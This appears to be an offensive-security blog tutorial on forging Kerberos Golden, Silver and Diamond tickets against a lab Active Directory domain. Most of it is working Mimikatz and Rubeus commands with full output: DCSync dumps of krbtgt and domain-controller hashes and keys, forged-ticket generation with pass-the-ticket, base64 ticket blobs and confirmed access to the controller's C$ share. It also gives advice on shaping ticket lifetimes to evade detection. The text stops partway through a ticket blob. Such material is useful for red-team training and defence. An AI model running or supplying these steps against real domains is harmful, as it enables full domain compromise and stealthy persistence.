If an adversary can gain access to NTLM or AES account keys, they can use these values to generate forged Kerberos tickets. Forging Kerberos tickets can be a great way to maintain access to an Active Directory environment.
This article will look at three common methods of doing this:
Golden Tickets
An adversary with access to a KRBTGT account hash can generate their own Kerberos tickets for any user in a domain, including administrators. This is known as a Golden Ticket Attack.
In older domains, the forged user did not necessarily need to exist in the domain. However, since KB5008380 the user account targeted does need to exist in the domain.
Rubeus can be used to generate forged Kerberos tickets.
Getting Access to the KRBTGT
First we need access to gain access to the KRBTGT account credentials. This account is responsible for the Kerberos Key Distribution Center Service which handles ticket requests and issues Ticket Granting Tickets (TGTs) for users.
We can use Mimikatz to perform a DCSync attack to gain access to the KRBTGT account hash.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 | mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\krbtgt" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\krbtgt [DC] 'bordergate.local' will be the domain [DC] 'DC01.bordergate.local' will be the DC server [DC] 'BORDERGATE\krbtgt' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) Object RDN : krbtgt ** SAM ACCOUNT ** SAM Username : krbtgt Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) Account expiration : Password last change : 28/04/2024 02:35:48 Object Security ID : S-1-5-21-1220112391-3624315575-3511410581-502 Object Relative ID : 502 Credentials: Hash NTLM: 9a1b5b20c1959f4bcaf9f4838eba7472 ntlm- 0: 9a1b5b20c1959f4bcaf9f4838eba7472 lm - 0: 6fba1ef75d362808b3594035721f1955 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 7b31ffa11e101561bcf68f2e3df76299 * Primary:Kerberos-Newer-Keys * Default Salt : BORDERGATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 aes128_hmac (4096) : 9d15c219d740aa2989b4f71b66af6df9 des_cbc_md5 (4096) : 1cec2c988513b9b9 * Primary:Kerberos * Default Salt : BORDERGATE.LOCALkrbtgt Credentials des_cbc_md5 : 1cec2c988513b9b9 * Packages * NTLM-Strong-NTOWF mimikatz(commandline) # exit Bye! |
Creating a Golden Ticket
Next, we need to use PowerView to get the FQDN of the domain, and it’s associated SID:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | PS C:\Tools> . .\PowerView.ps1 PS C:\Tools> Get-Domain Forest : bordergate.local DomainControllers : {DC01.bordergate.local} Children : {} DomainMode : Unknown DomainModeLevel : 7 Parent : PdcRoleOwner : DC01.bordergate.local RidRoleOwner : DC01.bordergate.local InfrastructureRoleOwner : DC01.bordergate.local Name : bordergate.local PS C:\Tools> Get-DomainSID S-1-5-21-1220112391-3624315575-3511410581 |
We can then use Rubeus with the /ptt flag to inject a the ticket for the Administrator user into our session, allowing us to access the domain controller’s C$ share.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 | C:\Users\alice>dir \\DC01.bordergate.local\C$ Access is denied. Rubeus.exe golden /aes256:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /user:Administrator /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.0 [*] Action: Build TGT [*] Building PAC [*] Domain : BORDERGATE.LOCAL (BORDERGATE) [*] SID : S-1-5-21-1220112391-3624315575-3511410581 [*] UserId : 500 [*] Groups : 520,512,513,519,518 [*] ServiceKey : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28 [*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256 [*] KDCKey : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28 [*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256 [*] Service : krbtgt [*] Target : bordergate.local [*] Generating EncTicketPart [*] Signing PAC [*] Encrypting EncTicketPart [*] Generating Ticket [*] Generated KERB-CRED [*] Forged a TGT for 'Administrator@bordergate.local' [*] AuthTime : 29/04/2024 18:05:12 [*] StartTime : 29/04/2024 18:05:12 [*] EndTime : 30/04/2024 01:05:12 [*] RenewTill : 06/05/2024 18:05:12 [*] base64(ticket.kirbi): doIFuTCCBbWgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGJvcmRlcmdhdGUubG9jYWyjggRIMIIERKADAgESoQMCAQOiggQ2 BIIEMibyjNIyVS2jRtuufcXCQEvPrkrF69mnqDdgwx3ap11aLkH5ixb2FvzqOvYJ6+GmR8I8s1EftgZF J8wn0Fru8NRp01qUHECVrGVUP1pxAPlZ7PPwBrAS0tMlAh8xpXg6NDGtLWIQsJtHvYC8N/BGupKqDjSy rcmnpCVjxM4R2rH2NI+ZHt/CSa2yKwNA57ecO91p7xwKOhHsQQMciVdgH0WAmtS0/KMxeK5Bda/Eqqzf d+tXS/51Y2jjxYd/muFVMrncD6CkrwZjM8Iq51GZnToxxCXbGV28d/EjJYiIbi9tkHO76MGxozjmuWht SRmc3TLDEoN/vOgDXoWy+bFbpxqYL6eVNuk8oDU0u1yochAhNm3j1zq1oZq2TvhO+PKE4s+7E6qhFAGR dMCGmPJA0cnAsUwxVr0/nW7Clm5NpNS+gJ8lSsnSoXeNpi+HbyQ7qIVuqU93i/yRDNI4Gvv0wFu7jaun yAkcYk6L48jqt9G93ZAkZm5UDo2oJUTcnz+MkdK0n8c+8si9PTzkic+z3avS+HH5YFR4eEnSvCnJ1oJ+ IFFFe9EmLW41I2VoEsNpHUBMCBZUQeaF5lAcJP35QUbmh6Xa5FMHJ3RzcT95XRnePSunE4ghpgbXPJW0 wnYJeE3SeBH7EmVh1EJ4uvCL6k13yeeGKInVeFGgnoIPqlbFqywvCDE0wWFaEjt1jCHneP79F++kDVNi p8XF85nu1PrwneX+I0JvuNHMUA+cMAkZjGxfkHORFsL/NDamHkwLIcCU0OYwZQnaWxz66NbF2bg7M/SK 0whu6XBmPufP2X/cm4elyRCxBAHK/KNc1ipHXz2xTJmNZoOiM72Hx5ua0rKXKry3XX5GFUkBTC4YuSO+ eoHVTupmQHdUSdc+Qtu6iYR5zqeerm7rLd/8PQ+PIS/cnVsUZAcce2lBZ66Q4OTf0r0bMUuy80DD+Vvo dpY05dju41dhc19a2h5VOlYRQAmwGb5GOFX0ZlvNU2W8nOFwqiMfC4aGJJTx0fYZR7Eg5oCegtE9Wsce J5nbMRYjeJZHVKCcqxZTgO5WTWfyM4Z7YNUDLJ2hLxBen5e2pb5EQTGfJ8Mh+65HX18DDFtMoFEHLO7d EeVIrl6jkZE1JaK8doBonMnh0iQadm8EB1XGFrZMVHENipW8kv0nxlXVC+DuqZsZVBKDTXNBtVHfhvsC HHpny7nX3R0rNFb1SX2O/01CyxT2N6N+pXY1oMmjizgin/u+iD4NcTVdnOKVBkNJiXhoeEpKcOvznJOp g8lSY36iDFFOSR8j+4evz3NgBM3S/ksRj79bRklxPtK6p/RrleLK6RZRUWfdNjUN++BhpGFCgW6qQEb7 q4bI1KA5MyoEyv4+GWYsbt0y2uaa35qtFItqqqtQB/4Ea1awVH7pYHFcQ88UMXVXdLLCv5IVJgZxCqOC AQswggEHoAMCAQCigf8Egfx9gfkwgfaggfMwgfAwge2gKzApoAMCARKhIgQg7CuaxBJK6J3dZ4PUxPrW BhILormRb83cgOB1KqdvgZKhEhsQQk9SREVSR0FURS5MT0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0 cmF0b3KjBwMFAEDgAACkERgPMjAyNDA0MjkxNDA1MTJapREYDzIwMjQwNDI5MTQwNTEyWqYRGA8yMDI0 MDQzMDAwMDUxMlqnERgPMjAyNDA1MDYxNDA1MTJaqBIbEEJPUkRFUkdBVEUuTE9DQUypJTAjoAMCAQKh HDAaGwZrcmJ0Z3QbEGJvcmRlcmdhdGUubG9jYWw= [+] Ticket successfully imported! C:\Tools>dir \\DC01\C$ Volume in drive \\DC01\C$ has no label. Volume Serial Number is 343D-F2D0 Directory of \\DC01\C$ 08/05/2021 09:20 <DIR> PerfLogs 28/04/2024 10:27 <DIR> Program Files 08/05/2021 10:40 <DIR> Program Files (x86) 28/04/2024 10:21 <DIR> Users 28/04/2024 10:35 <DIR> Windows 0 File(s) 0 bytes 5 Dir(s) 50,939,592,704 bytes free |
The same attack can be performed using Mimikatz:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # kerberos::golden /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt User : Administrator Domain : bordergate.local (BORDERGATE) SID : S-1-5-21-1220112391-3624315575-3511410581 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt Lifetime : 29/04/2024 18:06:13 ; 27/04/2034 18:06:13 ; 27/04/2034 18:06:13 -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session |
It’s possible to detect Golden ticket attacks by;
- Looking for service requests (TGS) have no corresponding TGT requests. This situation can be resolved using diamond tickets.
- By monitoring for tickets with unusually long lifespans.
To ensure that our ticket lifespan meets what’s typical in our target environment, we can first determine the current default policy with PowerView;
1 2 3 4 5 6 7 8 | PS C:\Tools> . .\PowerView.ps1 PS C:\Tools> Get-DomainPolicy | select -expand KerberosPolicy MaxTicketAge : 10 MaxRenewAge : 7 MaxServiceAge : 600 MaxClockSkew : 5 TicketValidateClient : 1 |
Based on this information, we can set the following flags in Mimikatz to generate tickets that look normal for the target environment;
/startoffset:0 /endin:600 /renewmax:7
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | PS C:\Tools> .\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # kerberos::golden /startoffset:0 /endin:600 /renewmax:7 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt User : Administrator Domain : bordergate.local (BORDERGATE) SID : S-1-5-21-1220112391-3624315575-3511410581 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt Lifetime : 30/04/2024 18:39:40 ; 01/05/2024 02:39:40 ; 30/04/2024 18:46:40 -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session |
Silver Tickets
Silver ticket attacks allow an adversary to forge TGS (Ticket Granting Service) tickets for a specific service. The benefits of this attack over golden tickets is no interaction with a domain controller is required, therefore potentially being more stealthy.
Getting Access to a Service Account
First we need to extract the service account password for the domain controller (dc01$).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\dc01$" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\dc01$ [DC] 'bordergate.local' will be the domain [DC] 'DC01.bordergate.local' will be the DC server [DC] 'BORDERGATE\dc01$' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) Object RDN : DC01 ** SAM ACCOUNT ** SAM Username : DC01$ Account Type : 30000001 ( MACHINE_ACCOUNT ) User Account Control : 00082000 ( SERVER_TRUST_ACCOUNT TRUSTED_FOR_DELEGATION ) Account expiration : Password last change : 28/04/2024 18:36:16 Object Security ID : S-1-5-21-1220112391-3624315575-3511410581-1000 Object Relative ID : 1000 Credentials: Hash NTLM: e04ae9e43f82df634c9e61d09577acb4 Supplemental Credentials: * Primary:Kerberos-Newer-Keys * Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local Default Iterations : 4096 Credentials aes256_hmac (4096) : 80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423 aes128_hmac (4096) : ed536a8d7a0daf906314d7387e8d2845 des_cbc_md5 (4096) : eaf1fb629e13c81f OldCredentials aes256_hmac (4096) : e7637bed1b981202d5497de82f4931d30b06d70068b40037b9e0acc60a124ed9 aes128_hmac (4096) : 76935fc442752233880f5aa0b23730e3 des_cbc_md5 (4096) : 790e8a4cd9dc0413 * Primary:Kerberos * Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local Credentials des_cbc_md5 : eaf1fb629e13c81f OldCredentials des_cbc_md5 : 790e8a4cd9dc0413 * Packages * NTLM-Strong-NTOWF mimikatz(commandline) # exit Bye! |
Creating a Silver Ticket
With access to the service account hash, we can then use Rubeus to generate a silver ticket to access the CIFS service:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 | C:\Tools>rubeus.exe silver /service:cifs/dc01.bordergate.local /aes256:80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt /user:dc01$ ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.0 [*] Action: Build TGS [*] Building PAC [*] Domain : BORDERGATE.LOCAL (BORDERGATE) [*] SID : S-1-5-21-1220112391-3624315575-3511410581 [*] UserId : 500 [*] Groups : 520,512,513,519,518 [*] ServiceKey : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423 [*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256 [*] KDCKey : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423 [*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256 [*] Service : cifs [*] Target : dc01.bordergate.local [*] Generating EncTicketPart [*] Signing PAC [*] Encrypting EncTicketPart [*] Generating Ticket [*] Generated KERB-CRED [*] Forged a TGS for 'dc01$' to 'cifs/dc01.bordergate.local' [*] AuthTime : 29/04/2024 18:04:22 [*] StartTime : 29/04/2024 18:04:22 [*] EndTime : 30/04/2024 03:04:22 [*] RenewTill : 06/05/2024 18:04:22 [*] base64(ticket.kirbi): doIFdzCCBXOgAwIBBaEDAgEWooIEWzCCBFdhggRTMIIET6ADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi KDAmoAMCAQKhHzAdGwRjaWZzGxVkYzAxLmJvcmRlcmdhdGUubG9jYWyjggQIMIIEBKADAgESoQMCAQOi ggP2BIID8mIanR3pno2NO0KdJSuHBveCO3YFMIfGov/FXWBYQOeRTy+x9MEl2ylJ25JvGCC/Q6g5n9ol 84hL8Tm2CyafV55HjJsD+zkvCf0YDAC2tf6YtoCNiGyYv/iH/5ki1Ux6dyok73YHGqvR9jwUnplB2Q11 nw8itpXz0cpGeB1GWBJztOIZQd81qCga2OLaYZT7EV/yxrWBMRKZ8R7I2jxlC1vJWRfcXim8naEnceHb vPbRvL4o2jF+5Wx5kTcSEZXNypwXiz4YLL2W4NE/gJGQnvp6dLG35XpQFM+tr1s8yrysa9By8RO/R3bR LG9V36z2f3jckRQmXYEcIzjbGl041ZZoXn8aDSimiqT+gKkVWrCmZcT5E5a0AjmEn/Mq4BuUpHry1M7p jPXmKJRqamQeVgcIiig7v+fvEdudZn0eR43EmUSs4AJC0YsuyxS7N25o/yPBZhxorlmVUvPSYtpHkgRX NjfePh600wamFHVOlpq7YMYI/v2PUMxzj57i5i5YlSsDMHeNEuaou4A9MmdMvi2hhHiWq7VTnXbJZcJL z2XJQ99B+twWrQlWZ+KXiLEpP9f9jezgt9x8LqudSbWNXMQB4XEkTDT8haSgR4aqSsyQnVYzhKcyfoP9 floiKKrU+sOLlw3Ds3fdphL3KoCXf/OrZshhLBOrYNZZ7q/hQrxdDx6enHYMvLjuMw5cnjJst5knAmwe sybb9aaKAvvfao7fWtqfvUcPXBCEirTBrgdMSStd0wMY3J5r0NUThq1vcLRqE89fnbl/B2+V9zkegfN4 FBxQIKoq2foW1Ome+nJfrn9i2m7nLpM0/GSN684xxF4PTqvYi8qnsmL6SqXWQ/GlAuJVS0GkVUkxUO2T YiTz8bTmm3s9a13IPS5VCVRHtSIFfpsv+ApV3kZ+xUgAATxoKao6lqWvy7h3BARiLQd1n875DVHGBahE Gyhf2oMBGZGsFT/6eWvR19uivOInOCP2ZpFiiyyKScWuAtk3Pm8P2vqzl8JwUo31k+97IOiVMyFlx2jm bHtvB/YrTZhQCWW+Db3mSFhO0cBwYy14lIMtEq4Dzs6HWn8zdAJ3aQDlC+Vv6+CJvyuu/RzFlKE/kwFG dDRHE8rFQxjhnIvDmBwBZTFJ0cfCWMf7J8SxtXUbcIWifn2lp73uaMsZw29QSfL7qwqseO/zH+ZK5wee XQwvLouPMS9P5FPUVMmNo1LVKfkzvLvZf+Ae/DwhPufFh8qXtplcArtUV8oyOfGdhL5jpNGN02bLNQfv rXWgxEIMbrX/nv7RI+t0upX3ICh+5egDPSqoktOEiQuHHQ7bSseTKsWVxhKHkURH/SGRCEDp7RBQo4IB BjCCAQKgAwIBAKKB+gSB932B9DCB8aCB7jCB6zCB6KArMCmgAwIBEqEiBCDMn2jXRb/3UrD5ppIp+tg6 0mBQthnPWbam/idQh1OtiKESGxBCT1JERVJHQVRFLkxPQ0FMohIwEKADAgEBoQkwBxsFZGMwMSSjBwMF AECgAACkERgPMjAyNDA0MjkxNjA0MjJapREYDzIwMjQwNDI5MTYwNDIyWqYRGA8yMDI0MDQzMDAyMDQy MlqnERgPMjAyNDA1MDYxNjA0MjJaqBIbEEJPUkRFUkdBVEUuTE9DQUypKDAmoAMCAQKhHzAdGwRjaWZz GxVkYzAxLmJvcmRlcmdhdGUubG9jYWw= [+] Ticket successfully imported! C:\Tools>dir \\dc01.bordergate.local\c$ Volume in drive \\dc01.bordergate.local\c$ has no label. Volume Serial Number is 343D-F2D0 Directory of \\dc01.bordergate.local\c$ 08/05/2021 09:20 <DIR> PerfLogs 28/04/2024 10:27 <DIR> Program Files 08/05/2021 10:40 <DIR> Program Files (x86) 28/04/2024 10:21 <DIR> Users 28/04/2024 10:35 <DIR> Windows 0 File(s) 0 bytes 5 Dir(s) 50,926,878,720 bytes free |
Diamond Tickets
Forged Golden and Silver tickets can be detected since the service requests (TGS) have no corresponding TGT requests.
In a Diamond ticket attack, an adversary requests valid TGT from a domain controller. This is then decrypted using the KRBTGT account hash, modified to meet the adversaries requirements then re-encrypted. Since an initial TGT request takes place, this reduces the chance of detection in comparison to a Golden Ticket attack.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 | C:\Tools>dir \\dc01.bordergate.local\C$ Access is denied. C:\Tools>dir \\dc01\C$ Access is denied. C:\Tools>Rubeus.exe diamond /krbkey:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:bordergate.local /ticketuserid:500 /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.0 [*] Action: Diamond Ticket [*] No target SPN specified, attempting to build 'cifs/dc.domain.com' [*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/DC01.bordergate.local' [+] Kerberos GSS-API initialization success! [+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output. [*] Found the AP-REQ delegation ticket in the GSS-API output. [*] Authenticator etype: aes256_cts_hmac_sha1 [*] Extracted the service ticket session key from the ticket cache: t/DPs5uWq4XvahoWh0mK0Uv4hiwa/n5TyR4R7p06d6Y= [+] Successfully decrypted the authenticator [*] base64(ticket.kirbi): doIFrDCCBaigAwIBBaEDAgEWooIEqDCCBKRhggSgMIIEnKADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEEJPUkRFUkdBVEUuTE9DQUyjggRYMIIEVKADAgESoQMCAQKiggRG BIIEQpUv6/+7xqLqaIJ9xJ3YMuMU7G4UoNQ5sMaVBZRHVOf2AwMyHLbx7vSLS0W2H49iwL0ABkCwnL7n uwUcSRNacBM3w9EgDEfSedVV6hCEQnfBd/Vy0Mb7NtaGF+8psLZNWbjWuuh+jaetoYu2u96lBQkrO4in topPGrxaLYJNski2glgQi2omojj3qxh64HxJ0aSv4fo+eVkvxejrtaa35Zy6FZ1SgkD4QWCR8cAIaX6U izpmhwTurY63NO8mghY+dYsxl2JwOxpmkzxVHFvp/uXko4M+blTqf5P7QvdIG9oPFCVvy+QWKNwyz7i9 8O0pYWCOnJoRYHhlonVq/a2Vw3b8fJ5jTD7bPFwvunQzdevu1NIXK2Z1UuXookY87qKyH1JVQyKTd0l3 NfeCB7uwwymzziP0hTd7dIpqKKOzgbI1rQUCl0Xcr86itj+ai2Ur8yXwf69IMZUYI6I5uwj+MN8/SIVi BgjilGig+mFRllgk6aCVrWvq/8nbLEbWqmTOObL8u9nOmzeUZ3pqkmYKPPYr6Dh2fGd8Igrpv/fCmVM7 OumSOA6ZV9neFdFxMVU6QP7Z+9FY26CRKYBrzLjJ6qiN29wQQqU4J/Ox5AWAgd8lV0SOlib4sEBTvI6v 5RK4ktTunBCU2JHQDlcEoVMx/jAnYLR4jnMmXkFk9agHKJoTifpF1oONqW+LRmB/fLgkKBBJje/yMESJ eaSydb6Cp+jdNLfnSqHm9L/W5E1orfLjFj1t1duLMgRJ0iEHRQyYMOyfttBts5hNsAMJ+QF1oGVlRoWv Hh7V5tsnzz6AKN/kO7EC3sVb9iNVEP6LY+RFf/2+EnOWcr8qn6bu15sOCdFzOJ/Ebsy95Ya+rSUdg764 CBKCwCqJVDfb3K+VYem9xrB4ofSCM/uc1dE33OCioDjdO23lyPrGQVOMu7KUDyPJwypRR7wGO7E09Lgx zPJzFKpwn5kaTC1muF0LI6R7EpjCNIHKU3X2gaMaRPVrBPOpeJZo9TW4B8xSIk+EOOpiU57Xn2TlZD4e np7Lql4TJTdvBmK57eMTKXoiDh1kne79i3buw94IkkwVFwrKrm9ILI2t8T7cDnTftkoknpMyEPy8I+D0 If8wbWDQMlmjihYW4QckSycParF1OIfPH4uBVsSZKwMt+ke+ayB49N9bvNAcvH4CC1v1MOjy5ruc2Jzj Ts8bwVgcku40sDQTg9Dn08T4EZCaqXVa9TuCdKbz+s9RxctkOBy7rniHZNjk6rUKbjN8xIoWGnyILnuh bAh4Ky5z65izGB2GdggHHgRFYgX6J2VdVT+MCtBz39RQcs0PcxqexnlTxwq47GQwqJ4V3OpGuCS1g8pY enEpnegQM2t2DNLksIaGIzEiTFbLH9C20GIzNFwIYp30VL/0HILRje15WuqAY7Ph0mIAOest/IHiDfXu yvz91m/ZuIqsvQQat8Ojge8wgeygAwIBAKKB5ASB4X2B3jCB26CB2DCB1TCB0qArMCmgAwIBEqEiBCCK bjp9Am+uC2DueQoTup4VO2XeocleiNQrE7iyCfLxj6ESGxBCT1JERVJHQVRFLkxPQ0FMohIwEKADAgEB oQkwBxsFYWxpY2WjBwMFAGChAAClERgPMjAyNDA0MzAxNTE2NDVaphEYDzIwMjQwNTAxMDAwMDM4WqcR GA8yMDI0MDUwNzE0MDAzOFqoEhsQQk9SREVSR0FURS5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQ Qk9SREVSR0FURS5MT0NBTA== [*] Decrypting TGT [*] Retreiving PAC [*] Modifying PAC [*] Signing PAC [*] Encrypting Modified TGT [*] base64(ticket.kirbi): doIGFDCCBhCgAwIBBaEDAgEWooIFCDCCBQRhggUAMIIE/KADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEEJPUkRFUkdBVEUuTE9DQUyjggS4MIIEtKADAgESoQMCAQOiggSm BIIEoh0/vYuRv0VL0djIBPwrq6FswBS2mObJSg7fY+ZyrDLDq7tbwcWk5ijEjfi7pqqsGbWVBtpam190 xXas2KvlcS8q63aDrUKsSlFbZVFMkI5AObNBxUa2G3xtWJR+pKBONsEngD8negVsVDjT1MavuZC7K88J iRz9cbdD+I6ngUOZzLioTG4ClBZa/EfCLWgUClSL6ICniPcbd9WRGk/ZND5coT2y/9VqNJAtKSzX5pcJ Aep1K/uhWihgtLQrXeJIS34GQ/xLiyqSs81zXvdD3ljeP65neIDmSNc8gWQfMqgFxMKUetlwoIyLGjSr frMm70nhC+afm2rWol3+vwcodkjJmukks/8+lueFkrKmD45RpBafDiKERfHOFAVRy5lviUJhGRToKD1d SJf5aShEo0fIjXOLyWfErVf1DesiaLNkHuucTP+6ZfX+zFIwOsCbyR7zsuNj3SOL1Ghy+SUKMte5XPOM mAwGTvZtMYjkWWj3z5ll4zr5yXUFmYnokjVSL+eKDTIaxILnL/IuUw6/f8tX3SMcFV8JvdcemicXZ9bZ ayeXGaZJoMPyl0Js2wFWlhl01TXNyYPSE1hmfLNZ5hJ4aHjkZRsgxTVdsDNmWcIKatRdcB3NM3qe3CVJ LqZVyJmX03/KgJArnBysjvpmKDSzxAlUHs/1ah8r8GZqfB1f3NC30M6zVGPuHuYcwcdif7z9DlJnN5H1 JTVp/bONmpKr7/4Q/kGMUstFADyv06WYtfnIkFSt6qT69bGHYxAlBve0Gg+gCRLIDv9kRmbOPuy7RkDP 0tb24H+Dtbzt766M21dLAKuK5XzVHFvz5+JJrJxZ40SvtgZH+QO1ufchkH1Qhmk8J8GgOskSTwS7Spjj C2D4YIJdCmXUrSHWKHkrUUAWKJ/5uFvmvESTvkotB3JwZeKVc2Fzzc6dEGVuyJbVkopNT9l12gfB0922 M0DW1MT1lVn+Y2ZuYqxRg5OFKJVJbzWKyOGWNReX9MeTZ6Pfl5jmX5DKzKQbCCTDz6AQHuI8M+kMHU7q nCvOUgoTxYvvXcqsZu9rs2jCZzBZmGMTAbmMeXGBNXtwxytEi2VBvo6Pe3HPNlcfDAK1zfqtrygypYif 